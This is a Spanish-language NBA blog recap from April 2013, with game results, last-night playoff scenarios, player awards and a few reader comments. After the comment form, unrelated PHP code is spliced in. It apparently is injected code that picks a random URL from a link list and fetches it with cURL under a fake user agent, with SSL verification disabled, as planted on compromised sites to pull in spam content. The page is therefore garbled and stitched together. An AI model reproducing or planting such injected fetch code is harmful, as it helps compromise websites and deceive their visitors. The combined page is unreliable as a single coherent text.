La Crónica: Noche prescindible

17 de April de 2013 por txusma

Noche triste y aburrida en la NBA. Triste porque la suspensión del Pacers – Celtics nos traía a todos a la memoria las terribles imágenes de la tragedia del maratón de Boston. Aburrida porque los dos partidos en juego resultaron un tostón.

Parece que para los Hawks enfrentarse a Pacers o Nets en primera ronda de playoff es más o menos lo mismo. Anoche, se preocuparon más de descansar que de pelear el partido y los Raptors acabaron paseándose (113-96). Lo más destacado del partido fue la confirmación de que la racha de Kyle Korve sigue viva. Ya van 73 partidos consecutivos anotando al menos un triple y el récord de Dana Barros (89) cada vez está más cerca.

En el otro partido de la noche los Clippers no tuvieron ningún problema para imponerse a unos Blazers que jugaron con 4 rookies de titulares (77-93). Los jovenzuelos plantaron cara en el primer cuarto pero se hundieron en el segundo y el tercero. Damian Lillard se convirtió en el jugador de los Blazers que más triples anota en una campaña y Victor Claver cuajó una buena actuación.

Recordemos por encima qué se juegan los equipos esta noche, la última jornada de la liga regular: 

Hawks y Bulls “luchan” por la 5ª plaza: Si ganan los Bulls serán quintos, en cambio los Hawks han de ganar y esperar que los Bulls pierdan.
Nuggets y Clippers pelean por la 3ª plaza: Los Clippers han de ganar y esperar que los Nuggets pierden para ser terceros.
Clippers y Grizzlies se juegan la ventaja de campo: Será para Clippers si ganan su partido frente los Kings, si pierden y gana Memphis ellos tendrán la ventaja de campo.
Warriors, Rockets, Lakers y Jazz deciden como se ordenan entre la 6ª y la 9ª posición de la Conferencia Oeste: Los Warriors serán 6º haciendo el mismo resultado o mejor que los Rockets. Estos bajarían a la 8ª plaza si pierden contra los Lakers, sinó serían 6º o 7º en función de lo que hicieran los Warriors. Los Lakers ganando se llevarían la 7ª plaza. Si pierden, deberían esperar el resultado de los Jazz. Si también pierden, los Lakers se clasificarían para los Playoffs y Utah quedaría fuera, pero si ganan sería al revés.

PREMIOS

MVP: El partido frente los Hawks resultó un paseo para los Raptors y Rudy Gay y Demar DeRozan lo aprovecharon. El primero anotó 22 puntos, cogió 5 rebotes y repartió 4 asistencias y el segundo anotó 30 puntos. Ninguno de los 2 disputó más de 28 minutos de juego.

Rookie: A pesar de los 6 pérdidas, Will Barton acabó jugando un buen partido (17 puntos, 6 rebotes, 5 asistencias y 3 robos).

Sorpresa: Minutos para todos en los Hawks y buena respuesta de Shelvin Mack, ese jugador que tan bien lo hacía en la universidad de Butler. Acabó con 11 puntos y 5 asistencias.

Decepción: Eric Bledsoe ha disfrutado de minutos pero nos ha dejado un poco fríos. El hype de principios de temporada ha ido languideciendo poco a poco.

Esfuerzo en vano: Nadie lo peleó tanto como para merecer el precio. En todo caso se lo damos a los rookies de los Blazers, que se esforzaron pero no llegaron.

Imágenes | AP Photos / Getty Images

Comenta

53 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Es que no me puedo ir… la gente en Sacramento, 40 minutos después de finalizar el partido

    https://twitter.com/DanWoikeSports/status/324760396399538176/photo/1 Espero que todos podáis verlo, aunque sea una imagen de twitter

      Citar

  2. Chipi dice:
    #2

    Ostras, habría que recopilar los comentarios de Jose Luis de esta noche, enmarcarlos y colgarlos en la sede de tjnba, jajaja. Qué tío más grande. Ni habrás dormido con tanta tensión en el cuerpo.

    Lo dije hace tiempo y lo mantengo. Estos Lakers no tienen mucho que hacer a priori en estos Playoffs, pero estoy seguro de que nadie quiere enfrentarse a ellos. Y no me sorprendería nada que llegasen a final de conferencia. Si así fuere, ¿fracaso o no fracaso?

      Citar

  3. Jose Luis dice:
    #3

    Si llegan a final de conferencia es un éxito rotundo, incluso una semifinal de conferencia estaría bien. ¿A quién se enfrentarían? ¿Denver o Warriors no? Quizá puedan ganar a ambos. Lo difícil es pasar a Spurs… y con Kobe yo les daría favoritos, pero sin él, pues no.

    Ayer salía la estadística de que Lakers es el 2º mejor equipo del Oeste en estos 40 partidos, primero Nuggets con 33-7 después Lakers y Memphis con 28-12. Pero claro, con Kobe. Lo que sí es que para el año próximo, si no hay tantísimas lesiones y si Howard se queda, hay equipo para final de conferencia mínimo.

    Problema: que ante el Thunder y el probable Heat… no sé como podrían a enfrentarse

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>